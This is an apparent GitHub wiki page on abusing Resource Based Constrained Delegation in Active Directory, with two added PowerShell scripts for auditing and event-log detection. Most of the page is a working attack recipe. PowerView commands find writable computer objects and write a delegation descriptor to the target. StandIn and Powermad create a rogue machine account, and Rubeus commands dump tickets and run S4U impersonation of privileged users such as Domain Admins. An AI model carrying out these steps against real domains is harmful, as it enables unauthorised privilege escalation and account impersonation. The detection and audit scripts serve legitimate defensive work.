Resource Based Constrained Delegation (RBCD) - CraigDonkin/Infrastructure GitHub Wiki
- RBCD allows delegation to be configured on the target (the resource) rather than on the source: the trust is stored in the target computer object's `ms-DS-AllowedToActOnBehalfOfOtherIdentity` attribute (LDAP display name `msDS-AllowedToActOnBehalfOfOtherIdentity`), which lists the accounts allowed to impersonate users to that computer.
- To modify this attribute you need one of the following rights on the target computer object:
  - WriteProperty (on the attribute itself)
  - GenericAll
  - GenericWrite
  - WriteDacl (which lets you grant yourself the rights above)
- A user might be able to create a new computer object in Active Directory (ms-DS-MachineAccountQuota permits this by default) and then set an SPN on it.
- If they can't create a new computer account but are local admin on a domain-joined machine, that machine's account can be used instead.
- The write privilege the user has on the target computer is used to configure RBCD so that the account with the SPN may impersonate any user against the victim computer.
- A full S4U attack (S4U2self followed by S4U2proxy) is then conducted from the account with the SPN to the target, for a user that has privileged access to it, such as a DA.
- Then pass the ticket (PTT) and act as the impersonated user.
- With PowerView:

```powershell
# Find computer objects where a principal from this domain (matched on the domain SID prefix)
# holds a right that permits writing the attribute
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
# How many computer accounts an ordinary user may create (default is 10)
Get-DomainObject -Identity "DC=<DC>" -Properties ms-DS-MachineAccountQuota
# SID of the computer account you control
Get-DomainComputer -Identity <computer name> -Properties objectSid
# Build a security descriptor granting <SID> full access, serialise it, and write it to the target's attribute
$sd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>)"; $sddb = New-Object byte[] ($sd.BinaryLength); $sd.GetBinaryForm($sddb, 0); Get-DomainComputer -Identity "<computername>" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $sddb} -Verbose
```
- The SID needs to be the SID of the domain computer you are local admin on (the account that will perform the impersonation).
- The `Get-DomainComputer -Identity` value is the target server you have WriteProperty rights to; this is the object whose `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute is being set.
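For the defender's side of the same configuration, here is an added audit script (it is not from this wiki). It assumes the RSAT ActiveDirectory module and uses only the standard Get-ADComputer, Get-ADDomain, Get-ADObject and Set-ADDomain cmdlets; the function names ConvertTo-RbcdTrustee, Get-RbcdAudit and Get-MachineAccountQuota are my own. It lists every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated and decodes the trustees from the same kind of descriptor the Set-DomainObject line above writes, whether the value comes back as a byte[] (ADSI/LDAP) or as the ActiveDirectorySecurity object the AD module returns, and it reports the MachineAccountQuota that decides whether an ordinary user can bring their own computer account.

```powershell
# Added audit example (not from the wiki). Requires the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

function ConvertTo-RbcdTrustee {
    # Decode an msDS-AllowedToActOnBehalfOfOtherIdentity value into the SIDs that are
    # allowed to act on behalf of other identities, resolved to account names where possible.
    param([Parameter(Mandatory)] $Value)

    if ($Value -is [byte[]]) {
        # Raw binary descriptor (e.g. from ADSI): parse it and walk the DACL
        $sd   = New-Object System.Security.AccessControl.RawSecurityDescriptor($Value, 0)
        $sids = foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -eq [System.Security.AccessControl.AceType]::AccessAllowed) { $ace.SecurityIdentifier }
        }
    } else {
        # ActiveDirectorySecurity (what Get-ADComputer returns): rules are already parsed
        $sids = $Value.GetAccessRules($true, $false, [System.Security.Principal.SecurityIdentifier]) |
            Where-Object { $_.AccessControlType -eq 'Allow' } |
            ForEach-Object { $_.IdentityReference }
    }
    foreach ($sid in $sids) {
        $name = '<unresolved>'   # a deleted or foreign account leaves a dangling SID; still worth reporting
        try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        [pscustomobject]@{ Sid = $sid.Value; Account = $name }
    }
}

function Get-RbcdAudit {
    # Every computer object with the attribute set, one row per trustee.
    # In most domains the expected result is empty apart from deliberately configured
    # front-end/back-end pairs; anything else deserves a look at who set it and when.
    Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity' |
    ForEach-Object {
        $computer = $_
        ConvertTo-RbcdTrustee -Value $computer.'msDS-AllowedToActOnBehalfOfOtherIdentity' |
            ForEach-Object {
                [pscustomobject]@{ Target = $computer.Name; TrusteeSid = $_.Sid; Trustee = $_.Account }
            }
    }
}

function Get-MachineAccountQuota {
    # ms-DS-MachineAccountQuota lives on the domain naming context object
    $dn = (Get-ADDomain).DistinguishedName
    (Get-ADObject -Identity $dn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
}

# Usage
Get-RbcdAudit | Format-Table -AutoSize
$quota = Get-MachineAccountQuota
if ($quota -gt 0) {
    Write-Warning "ms-DS-MachineAccountQuota is $quota: any authenticated user can create that many computer accounts."
    # Hardening (run deliberately, after delegating computer-join rights to the accounts that need them):
    # Set-ADDomain -Identity (Get-ADDomain).DNSRoot -Replace @{'ms-DS-MachineAccountQuota' = '0'}
}
```

Run it with an account that can read computer objects; no privileged rights are needed. A trustee SID that belongs to a workstation account, or one that no longer resolves, is the configuration the rest of this page produces and should be traced back to the write that created it.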
- Use the machine account you control to perform S4U impersonation, authenticating with its TGT or its hash (RC4/AES):

```
Rubeus.exe triage
Rubeus.exe dump /luid:<luid> /service:krbtgt /nowrap
Rubeus.exe s4u /user:<machine account> /impersonateuser:<user to impersonate> /msdsspn:<SPN> /ticket:<TGT>
Rubeus.exe createnetonly /program:<program> /domain:<domain> /username:<username> /password:<fakepassword> /ticket:<ticket>
```
- Alternatively, if ms-DS-MachineAccountQuota allows it, create a new computer account (with StandIn or Powermad), derive its key, request a TGT for it, and then configure RBCD on the target as above:

```powershell
# Create the computer account with StandIn ...
StandIn.exe --computer <computername> --make
# ... or with Powermad
Import-Module powermad
New-MachineAccount -MachineAccount <computername> -Password $(ConvertTo-SecureString '<computer password>' -AsPlainText -Force) -Verbose
# Derive the new account's Kerberos keys from its password and request a TGT with the AES256 key
Rubeus.exe hash /password:<password> /user:<computername>$ /domain:<domain>
Rubeus.exe asktgt /user:<computer>$ /aes256:<hash> /nowrap
# Grant the new account's SID access on the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute
$sd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>)"; $sddb = New-Object byte[] ($sd.BinaryLength); $sd.GetBinaryForm($sddb, 0); Get-DomainComputer -Identity "<computername>" | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity' = $sddb} -Verbose
```
- The SID needs to be the SID of the domain computer you created.
- The `Get-DomainComputer -Identity` value is the target server you have WriteProperty rights to; this is the object whose `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute is being set.
- Use the machine account you created to perform S4U impersonation, authenticating with its TGT or its hash (RC4/AES):

```
Rubeus.exe s4u /user:<machine account> /impersonateuser:<user to impersonate> /msdsspn:<SPN> /ticket:<TGT>
Rubeus.exe createnetonly /program:<program> /domain:<domain> /username:<username> /password:<fakepassword> /ticket:<ticket>
```
- Cleanup: clear the attribute on the target when done.

```powershell
Get-DomainComputer -Identity <computer> | Set-DomainObject -Clear msDS-AllowedToActOnBehalfOfOtherIdentity
```
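Both the write to the attribute and the creation of a throwaway computer account leave records on the domain controller, so here is an added detection example for the blue-team side (not from this wiki). It assumes "Audit Directory Service Changes" is enabled and that computer objects carry a SACL auditing Write Property, without which event 5136 is not logged; the function names ConvertFrom-EventData, Get-RbcdWriteEvents and Get-ComputerAccountCreations and the DC name `DC01` are my own placeholders. It reads the Security log with the standard Get-WinEvent cmdlet, keeps 5136 events whose AttributeLDAPDisplayName is msDS-AllowedToActOnBehalfOfOtherIdentity (the logged value is the SDDL, so the trustee SID is visible after the last `;;;`), and pairs them with 4741 computer-account creations.

```powershell
# Added detection example (not from the wiki). Run against a domain controller's Security log.

function ConvertFrom-EventData {
    # Flatten an event's <EventData><Data Name=...> elements into a hashtable
    param([Parameter(Mandatory)] [System.Diagnostics.Eventing.Reader.EventRecord] $Event)
    $xml = [xml]$Event.ToXml()
    $data = @{}
    foreach ($n in $xml.Event.EventData.Data) { $data[$n.Name] = $n.'#text' }
    $data
}

function Get-RbcdWriteEvents {
    # 5136 = a directory service object was modified. Keep only writes to the RBCD attribute.
    param([string]$ComputerName = 'DC01',                      # placeholder DC name
          [datetime]$Since = (Get-Date).AddDays(-7))

    Get-WinEvent -ComputerName $ComputerName -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'Security'; Id = 5136; StartTime = $Since
    } | ForEach-Object {
        $d = ConvertFrom-EventData -Event $_
        if ($d['AttributeLDAPDisplayName'] -eq 'msDS-AllowedToActOnBehalfOfOtherIdentity') {
            [pscustomobject]@{
                Time      = $_.TimeCreated
                Actor     = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
                Target    = $d['ObjectDN']
                Operation = $d['OperationType']     # %%14674 = value added, %%14675 = value deleted (the cleanup step)
                ValueSddl = $d['AttributeValue']    # e.g. O:BAD:(A;;...;;;S-1-5-21-...-1234): trustee SID after the last ';;;'
            }
        }
    }
}

function Get-ComputerAccountCreations {
    # 4741 = a computer account was created. The actor is the account that used its MachineAccountQuota.
    param([string]$ComputerName = 'DC01',
          [datetime]$Since = (Get-Date).AddDays(-7))

    Get-WinEvent -ComputerName $ComputerName -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName = 'Security'; Id = 4741; StartTime = $Since
    } | ForEach-Object {
        $d = ConvertFrom-EventData -Event $_
        [pscustomobject]@{
            Time       = $_.TimeCreated
            Creator    = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            NewAccount = $d['TargetUserName']
        }
    }
}

# Usage: attribute writes by anyone other than the expected admin tooling, and computer
# accounts created by ordinary users, are the two signals worth alerting on.
Get-RbcdWriteEvents        | Format-Table Time, Actor, Target, Operation, ValueSddl -AutoSize
Get-ComputerAccountCreations | Format-Table -AutoSize
```

Both functions accept a `-Since` window so they can run on a schedule; a creation followed shortly by a 5136 write whose SDDL names the freshly created account's SID is the sequence the steps on this page produce.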